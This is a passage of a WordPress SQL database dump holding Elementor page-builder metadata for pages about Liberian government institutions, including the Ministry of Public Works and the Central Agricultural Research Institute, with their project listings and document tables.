streets, airport, seaport, and all other public infrastructure in the Republic of Liberia.<\\/p><p>The Ministry sole purposes are surveying, drafting and designing construction and supervising construction contracts, and the maintenance of roads, bridges, and public buildings.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"321d2cc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a8d61b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5373839\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe27600\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mpw\\\",\\\"tag_id\\\":\\\"63\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mpw\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"dae3b98\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mpw\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(27509,3994,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(27510,3994,'_thumbnail_id','3527'),(27512,1594,'internet','http://www.mpw.gov.lr/'),(27513,1594,'_pods_institution_logo','a:1:{i:0;i:2234;}'),(27515,1592,'_last_editor_used_jetpack','classic-editor'),(27516,1590,'_last_editor_used_jetpack','classic-editor'),(27517,1588,'_last_editor_used_jetpack','classic-editor'),(27518,3995,'_elementor_edit_mode','builder'),(27519,3995,'_elementor_template_type','wp-post'),(27520,3995,'_elementor_version','2.7.5'),(27521,3995,'_wp_page_template','default'),(27522,3995,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"20cbe9f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>CARI\'s strategy is designed to enhance the its capacity, research and development (R&amp;D) partners to react rapidly to the needs of the stakeholders on knowledge, information and technologies (KIT) required pursuing effective management of natural resources for agriculture and environment in Liberia.<\\/p><p>CARI strategy also provides the focus and guiding principles for achieving a client-oriented and demand-led research for development, with special emphasis on smallholder farmers and entrepreneurs in the agricultural sector.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3d3914\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"70602b6f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"237f6997\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"321f3817\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"cari\\\",\\\"tag_id\\\":\\\"49\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"cari\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"32aca63d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"2da625e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"76368934\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f4d863d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:cari\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(27523,3995,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(27525,3996,'_elementor_edit_mode','builder'),(27526,3996,'_elementor_template_type','wp-post'),(27527,3996,'_elementor_version','2.7.5'),(27528,3996,'_wp_page_template','default'),(27529,3996,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"20cbe9f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>CARI\'s strategy is designed to enhance the its capacity, research and development (R&amp;D) partners to react rapidly to the needs of the stakeholders on knowledge, information and technologies (KIT) required pursuing effective management of natural resources for agriculture and environment in Liberia.<\\/p><p>CARI strategy also provides the focus and guiding principles for achieving a client-oriented and demand-led research for development, with special emphasis on smallholder farmers and entrepreneurs in the agricultural sector.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3d3914\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"70602b6f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"237f6997\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"321f3817\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"cari\\\",\\\"tag_id\\\":\\\"49\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"cari\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"32aca63d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"2da625e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"76368934\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f4d863d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:cari\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(27530,3996,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(27532,1592,'internet','https://www.cari.gov.lr/'),(27533,1592,'_pods_institution_logo','a:1:{i:0;i:2693;}'),(27535,3997,'_elementor_edit_mode','builder'),(27536,3997,'_elementor_template_type','wp-post'),(27537,3997,'_elementor_version','2.7.5'),(27538,3997,'_wp_page_template','default'),(27539,3997,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a1cd518\",\"elType\":\"widget\",\"settings\":{\"editor\":\"National Legislature on Natural Resources Committee coming 